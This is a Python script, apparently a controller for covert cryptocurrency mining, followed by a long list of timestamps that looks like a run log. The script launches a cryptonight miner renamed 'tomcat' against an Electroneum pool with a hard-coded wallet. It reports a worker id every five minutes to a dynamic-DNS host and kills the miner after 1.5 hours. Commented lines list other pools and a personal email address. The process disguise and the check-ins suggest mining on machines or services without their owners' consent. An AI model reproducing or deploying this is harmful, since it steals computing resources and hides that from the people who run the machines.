import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:04.116611
#2018-02-17 16:52:01.782314
#2018-02-17 18:41:01.159886
#2018-02-17 20:29:01.704009
#2018-02-17 22:15:08.396941
#2018-02-18 00:00:10.399514
#2018-02-18 01:51:05.253380
#2018-02-18 03:39:01.546870
#2018-02-18 05:26:05.255867
#2018-02-18 07:18:01.627446
#2018-02-18 09:06:05.102655
#2018-02-18 10:52:07.175998
#2018-02-18 12:39:06.637168
#2018-02-18 14:26:04.361729
#2018-02-18 16:16:02.085137
#2018-02-18 18:04:01.686069
#2018-02-18 19:51:04.653012
#2018-02-18 21:39:07.099318
#2018-02-18 23:27:06.809275
#2018-02-19 01:14:04.722058
#2018-02-19 03:01:04.440176
#2018-02-19 04:48:05.801268
#2018-02-19 06:34:07.226248
#2018-02-19 08:23:05.746429
#2018-02-19 10:13:05.755361
#2018-02-19 12:00:09.092682
#2018-02-19 13:48:07.976453
#2018-02-19 15:38:09.569747
#2018-02-19 17:26:01.300747
#2018-02-19 19:14:01.575460
#2018-02-19 21:01:01.603776
#2018-02-19 22:48:03.962808
#2018-02-20 00:31:04.333182
#2018-02-20 02:18:01.239174
#2018-02-20 04:09:03.711534
#2018-02-20 05:52:04.791654
#2018-02-20 07:37:07.744125
#2018-02-20 09:22:01.911491
#2018-02-20 11:06:05.553779
#2018-02-20 12:53:05.932844
#2018-02-20 14:37:06.914111
#2018-02-20 16:22:06.082210
#2018-02-20 18:10:04.855625
#2018-02-20 20:03:01.240472
#2018-02-20 21:49:08.181236
#2018-02-20 23:31:04.406311
#2018-02-21 01:16:01.556150
#2018-02-21 03:03:03.740349
#2018-02-21 04:52:05.400667
#2018-02-21 06:40:05.878094
#2018-02-21 08:27:01.697202
#2018-02-21 10:12:04.851580
#2018-02-21 11:59:07.406938
#2018-02-21 13:49:09.076841
#2018-02-21 15:34:10.858296
#2018-02-21 17:23:05.019530
#2018-02-21 19:11:07.405976
#2018-02-21 20:58:08.465736
#2018-02-21 22:45:01.850385
#2018-02-22 00:35:09.209049
#2018-02-22 02:22:01.277226
#2018-02-22 04:08:06.688313
#2018-02-22 05:52:06.831020
#2018-02-22 07:37:06.547339
#2018-02-22 09:25:06.159242
#2018-02-22 11:11:05.571534
#2018-02-22 12:56:09.713641
#2018-02-22 14:44:01.271982
#2018-02-22 16:31:01.263193
#2018-02-22 18:16:12.762478
#2018-02-22 20:08:08.716116
#2018-02-22 21:55:06.511477
#2018-02-22 23:44:01.267391
#2018-02-23 01:32:08.346674
#2018-02-23 03:18:08.525617
#2018-02-23 05:05:07.662835
#2018-02-23 06:50:07.630084
#2018-02-23 08:41:07.203644
#2018-02-23 10:57:08.115939
#2018-02-23 12:54:01.838364
#2018-02-23 14:37:08.621867
#2018-02-23 16:27:04.582451
#2018-02-23 18:13:08.246857
#2018-02-23 19:59:05.490761
#2018-02-23 21:42:06.646124
#2018-02-23 23:34:06.347179
#2018-02-24 01:22:07.046649
#2018-02-24 03:14:06.809112
#2018-02-24 04:59:05.095771
#2018-02-24 06:46:07.804759
#2018-02-24 08:41:07.408626
#2018-02-24 10:25:04.797560
#2018-02-24 12:20:06.301207
#2018-02-24 14:13:06.152606
#2018-02-24 16:00:01.512504
#2018-02-24 17:52:03.825813
#2018-02-24 19:39:06.277237
#2018-02-24 21:26:05.568034
#2018-02-25 00:09:04.995899
#2018-02-25 04:03:07.068233
#2018-02-25 07:36:01.699345